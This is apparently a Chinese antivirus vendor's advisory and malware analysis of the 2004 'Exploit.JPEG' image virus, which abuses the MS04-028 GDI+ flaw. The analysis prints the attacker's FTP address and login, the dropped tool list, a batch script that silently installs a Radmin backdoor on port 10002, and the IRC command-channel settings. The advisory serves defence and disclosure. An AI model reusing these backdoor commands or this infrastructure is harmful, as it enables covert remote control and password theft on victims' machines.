利用微软新漏洞的图片病毒“图片骇客”(Exploit.Win32.MS04-028.gen)终于现身了,用户在浏览互联网图片时就会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒,从而被远程计算机得到控制权。金山毒霸反病毒专家认为,如果用户浏览了带毒电子图片,就有可能泄露比如:网络游戏密码、QQ账号、个人银行密码等关键信息,而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片!让人防不甚防。
据金山毒霸反病毒中心监测,到目前为止这种图片病毒感染的例子还不多,但是这说明利用这个漏洞来传播的图片病毒现身了,第一波图片病毒攻击已经开始。最为可怕的是,以后还会有各种攻击出现,不仅会带木马病毒,包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。
金山反病毒中心介绍,该图片病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的。
专家提醒:用户应立即打上各种应用程序补丁,如果怀疑机器染毒,电脑用户可查看机器10002端口有无程序访问,以防木马病毒偷盗各种密码。
目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具(下载地址:http://db.kingsoft.com/special/virtusspecial/JPEG/index.shtml),欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。
技术资料分析:
病毒名称:Exploit.JPEG
病毒长度:4098
威胁级别:二级
中文名称:图片骇客
病毒别名:
Exploit.Win32.MS04-028.gen[AVP]
受影响系统:未打MS04-028补丁的英文版WinXP SP1
发现时间:9月28日
病毒简介:
金山反病毒中心介绍,该病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的
技术细节:
当用户通过资源管理器浏览该文件后,病毒会利用GDI+漏洞,尝试溢出执行下载命令。如果溢出失败,则会导致资源管理器崩溃
如果溢出成功,则病毒尝试从以下FTP上下载远程控制文件
ftp://2××.1××.4×.2×/www/system/
文件包括:
文件名 大小
AdmDll.dll 90112
Fport.exe 114688
ServUStartUpLog.txt 663
VNCHooks.dll 32768
WinRun.dll 1407
WinRun.exe 811008
driver.log 1268
drives.exe 24576
execute.bat 150
filter3.ocx 0
irc-u.cfg 1052
irc-u.dat 0
irc-u.debug.log 16802
irc-u.dll 102400
kill.exe 26624
nc.exe 59392
nvsvc.exe 241664
nvsvc32.dll 36864
omnithread_rt.dll 45056
peek.exe 34304
raddrv.dll 29408
radmin.reg 713
rcrypt.exe 26112
reg.exe 40960
uptime.exe 6656
vns.exe 208896
3、运行execute.bat 文件,通过Radmin远程管理工具,建立后门,端口为10002。
4、会建立一个IRC连接,连接到#FurQ频道。
0.其他信息:
FTP地址如下:
ftp://209.171.43.27/www/system/
用户名:bawz
密码:pagdba
execute.bat 内容如下
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
IRC配置文件如下:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d
目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
热门文章 设置高强度密码技巧之
最新文章
360连回家是什么 360wifi密码怎么设置才不
电信级的RSA加密后的密码的破解方法范海辛的惊奇之旅分辨率修改方法eset nod32 最新用户名和密码 eset nod32 最关于近期PC6遭受DDOS攻击声明
人气排行 盗号者的常用盗号方法最新瑞星升级助手v7.1.5及防杀方法wifi密码怎么设置才不会被破解?wifi防蹭网网站Tags标签对网站关键词排名的意义eset nod32 最新用户名和密码 eset nod32 最网站导航栏设计趋势目前最新的计算机病毒有哪些如何彻底删除QQ医生
查看所有0条评论>>